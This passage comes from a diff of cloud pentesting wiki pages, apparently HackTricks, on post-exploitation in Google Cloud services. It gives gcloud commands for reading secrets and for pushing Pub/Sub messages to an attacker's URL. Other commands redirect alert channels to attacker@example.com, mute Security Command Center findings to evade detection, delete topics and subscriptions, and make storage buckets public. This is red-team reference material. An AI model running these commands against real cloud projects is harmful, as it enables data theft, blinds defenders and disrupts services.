gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
### `monitoring.notificationChannels.delete`
Delete a configured channel:
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
### `monitoring.notificationChannels.update`
Update labels of a channel to disrupt it:
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,140 @@
# GCP - Pub/Sub Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Pub/Sub
For more information about Pub/Sub check the following page:
{{#ref}}
../gcp-services/gcp-pub-sub.md
{{#endref}}
### `pubsub.topics.publish`
Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
```bash
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
```
### `pubsub.topics.detachSubscription`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```
### `pubsub.topics.delete`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
It's possible to delete a topic even with subscriptions attached to it.
```bash
gcloud pubsub topics delete <TOPIC NAME>
```
### `pubsub.topics.update`
Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
### `pubsub.topics.setIamPolicy`
Give yourself permission to perform any of the previous attacks.
### **`pubsub.subscriptions.create,`**`pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)
Get all the messages in a web server:
```bash
# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
```
Create a subscription and use it to **pull messages**:
```bash
# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted
```
### `pubsub.subscriptions.delete`
**Delete a subscription** could be useful to disrupt a log processing system or something similar:
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```
### `pubsub.subscriptions.update`
Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
```bash
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
```
### `pubsub.subscriptions.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
### `pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)
Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
If there aren't any schemas you might need to create one.
```json:schema.json
{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}
```
```bash
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json
```
### `pubsub.schemas.delete`
This might look like deleting a schema you will be able to send messages that doesn't fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is **USELESS**:
```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```
### `pubsub.schemas.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
### `pubsub.snapshots.create`, `pubsub.snapshots.seek`
This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,22 @@
# GCP - Secretmanager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Secretmanager
For more information about Secret Manager check:
{{#ref}}
../gcp-services/gcp-secrets-manager-enum.md
{{#endref}}
### `secretmanager.versions.access`
This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,58 @@
# GCP - Security Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Security
For more information check:
{{#ref}}
../gcp-services/gcp-security-enum.md
{{#endref}}
### `securitycenter.muteconfigs.create`
Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
```bash
# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
### `securitycenter.muteconfigs.update`
Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
```bash
# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
### `securitycenter.findings.bulkMuteUpdate`
Mute findings based on a filer:
```bash
# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
```
A muted finding won't appear in the SCC dashboard and reports.
### `securitycenter.findings.setMute`
Mute findings based on source, findings...
```bash
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
```
### `securitycenter.findings.update`
Update a finding to indicate erroneous information:
```bash
gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,34 @@
# GCP - Storage Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Cloud Storage
For more information about CLoud Storage check this page:
{{#ref}}
../gcp-services/gcp-storage-enum.md
{{#endref}}
### Give Public Access
It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
```bash
# Disable public prevention
gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
# Make all objects in a bucket public
gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
## I don't think you can make specific objects public just with IAM
# Make a bucket or object public (via ACL)
gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
```
If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -0,0 +1,21 @@
# GCP - Workflows Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Workflow
Basic information:
{{#ref}}
../gcp-services/gcp-workflows-enum.md
{{#endref}}
### Post Exploitation
The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section:
{{#ref}}
../gcp-privilege-escalation/gcp-workflows-privesc.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}